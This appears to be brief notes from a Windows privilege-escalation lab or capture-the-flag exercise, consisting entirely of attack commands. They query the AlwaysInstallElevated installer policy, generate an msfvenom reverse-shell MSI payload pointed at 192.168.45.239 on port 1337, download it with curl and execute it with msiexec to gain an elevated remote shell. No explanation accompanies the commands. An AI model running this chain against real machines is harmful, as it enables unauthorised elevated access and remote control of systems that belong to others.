Priv Esc

PS C:\Shenzi> reg query HKCU\Software\Policies\Microsoft\Windows\Installer

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.239 LPORT=1337 -f msi -o pwned.msi

PS C:\programdata> curl 192.168.45.239/pwned.msi -o pwned.msi
PS C:\programdata> msiexec /i pwned.msi